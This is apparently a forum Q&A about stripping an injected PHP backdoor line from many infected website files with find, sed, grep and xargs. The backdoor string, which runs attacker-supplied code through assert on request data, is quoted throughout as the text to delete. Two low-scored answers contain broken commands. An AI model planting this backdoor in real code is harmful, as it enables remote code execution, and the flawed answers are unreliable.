# Linux command to find and remove text from several files at once

Tags: sed, find, malware

I have my site infected by a virus. This virus added this line in several files in my site. My idea is to remove this line of text with a unique command from the terminal.

Let's say I have the folder 'my-folder' and inside it, my files: 'file-1.php', 'file-2.php' and so on.

And, let's say there are several files infected.

Is there a command to find and remove this line of code in several file **at once**?

Text to remove: extract($_REQUEST) && @assert(stripslashes($accept)) && exit;

I found this, but it only works with a single file:

`$ sed 's/extract($_REQUEST) && @assert(stripslashes($accept)) && exit;//' my-file.php`

Can I do this?

Comment: I'd be remiss if I didn't link in Server Fault's [How do I deal with a compromised server?](https://serverfault.com/questions/218005/how-do-i-deal-with-a-compromised-server)

Answer (score 3, accepted):

1. You can combine `sed` with `find` to make it recursive. Something like that:

   ```
   find . -type f -name "*php" -exec sed -i.bak 's/extract($_REQUEST) && @assert(stripslashes($accept)) && exit;//' {} \+
   ```

   Note that it will walk through your current directory tree and apply sed to every existing "*php" file. It will also create .bak backup file for every changed one (so you could restore it later just in case). If you don't need a backup, replace `-i.bak` just with `-i`. Otherwise you can remove backups later (once you verified it's all fine) with something like `find . -name "*php.bak" -delete`.
2. This step won't help you to fix everything right now, but it might definitely save you time in the future: keep your directory with scripts under `git` (well ideally it should be a complete CI/CD solution, but you can start just with git), so you could easily roll back / forward changes which were applied to your files.

Comment: Applying `sed` to all `php` files means you end up with a backup file for each, and every file gets rewritten, even if you specify no backup. I'd prefer touching only those files which have been modified by the virus.

Answer (score 2):

Search for files containing the malicious string, and edit them with `sed`:

```
ag -lF --php 'extract($_REQUEST) && @assert(stripslashes($accept)) && exit;' | xargs sed -i 's/extract($_REQUEST) && @assert(stripslashes($accept)) && exit;//'
```

I often rely on [`ag`](https://github.com/ggreer/the_silver_searcher) to only search `php`files with the `--php` flag. If you prefer, you can accomplish the same with `grep -r -i --include \*.php`:

```
grep -rilF --include \*.php 'extract($_REQUEST) && @assert(stripslashes($accept)) && exit;' | xargs sed -i 's/extract($_REQUEST) && @assert(stripslashes($accept)) && exit;//'
```

Comment: What is difference with the Rush code? I tried with `find . -type f -name "*php" -exec sed -i 's/extract($_REQUEST) && @assert(stripslashes($accept)) && exit;//' {} \+` and I get no backups files.

Comment: I get your point, your code will only affect the infected files.

Comment: I tried your code and get this message: `-bash: ag: command not found`. I guess that I need to install something in my server, am I right?

Comment: @JPashs Yes, either install ag - the_silver_searcher or, if you can't or prefer not to, use grep with the equivalent options.

Answer (score 0):

depending on your command, I suggest you to use "for loop" to do that:

```
for i in file-1.php file-2.php
        do sed 's/extract($_REQUEST) && @assert(stripslashes($accept)) && exit;//'
done
```

also you can add whatever file do you want to "for i in file-1.php file-2.php file-n.php

Answer (score 0):

You can use below method to delete the lines in file which contains particualar pattern

You can mention the files in for loop

```
for i in file1 file2
do
sed -i '/Text to remove: extract($_REQUEST) && @assert(stripslashes($accept)) && exit/d' $i
done
```